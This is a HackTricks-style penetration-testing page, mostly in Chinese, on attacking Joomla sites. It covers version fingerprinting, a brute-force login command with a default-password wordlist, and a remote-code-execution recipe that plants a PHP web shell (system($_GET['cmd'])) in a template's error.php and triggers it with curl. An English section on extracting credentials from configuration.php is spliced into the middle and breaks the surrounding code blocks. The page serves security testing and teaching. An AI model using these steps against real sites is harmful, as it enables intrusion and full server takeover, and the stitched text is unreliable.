hacktricks/network-services-pentesting/pentesting-web/joomla.md

# Joomla

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

* 您在**网络安全公司**工作吗？ 想要看到您的**公司在HackTricks中宣传**吗？ 或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗？ 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家[NFTs收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的 **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。

</details>

### Joomla统计信息

Joomla收集一些匿名的[使用统计信息](https://developer.joomla.org/about/stats.html)，例如Joomla、PHP和数据库版本的分布以及Joomla安装中使用的服务器操作系统。 可以通过他们的公共[API](https://developer.joomla.org/about/stats/api.html)查询这些数据。
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
```
## 枚举

### 发现/足迹

* 检查 **meta**
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
```
* robots.txt

* robots.txt
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```
* README.txt

## Joomla

### Joomla Configuration File

The Joomla configuration file `configuration.php` contains sensitive information such as database credentials and secret keys. It is located in the root directory of the Joomla installation.

### Finding Joomla Configuration File

To find the Joomla configuration file, you can use various methods such as:

1. **Manual Inspection**: Look for `configuration.php` in the root directory of the Joomla installation.
   
2. **Automated Tools**: Tools like `Joomscan` can help in identifying the Joomla configuration file.

### Joomla Configuration File Structure

The Joomla configuration file has a specific structure that includes database connection settings, secret keys, and other configuration options. Understanding this structure is crucial for extracting valuable information during a penetration test.

### Exploiting Joomla Configuration File

Once you have access to the Joomla configuration file, you can extract sensitive information like database credentials, secret keys, and other configuration details. This information can be used to further exploit the Joomla application or escalate privileges on the target system.

### Protecting Joomla Configuration File

To protect the Joomla configuration file from unauthorized access, ensure that proper file permissions are set. Restrict access to the file using secure configurations and regularly monitor for any unauthorized changes.
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```
### 版本

* 在 **/administrator/manifests/files/joomla.xml** 中可以看到版本。
* 在 **/language/en-GB/en-GB.xml** 中可以获取 Joomla 的版本。
* 在 **plugins/system/cache/cache.xml** 中可以看到一个大致的版本。
```bash
droopescan scan joomla --url http://joomla-site.local/
```
### Brute-Force

您可以使用此[脚本](https://github.com/ajnik/joomla-bruteforce)尝试对登录进行暴力破解。
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin
```
## RCE

如果你成功获取了**管理员凭证**，你可以通过添加一小段**PHP代码**来实现**RCE**。我们可以通过**自定义**一个**模板**来实现这一点。

1. 在`Configuration`下方点击**`Templates`**以打开模板菜单。
2. 点击一个**模板**名称。让我们选择`Template`列标题下的**`protostar`**。这将带我们到**`Templates: Customise`**页面。
3. 最后，你可以点击一个页面以查看**页面源代码**。让我们选择**`error.php`**页面。我们将添加一个**PHP 一行代码来执行代码**，如下所示：
   ```php
   system($_GET['cmd']);
   ```
4. **保存并关闭**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`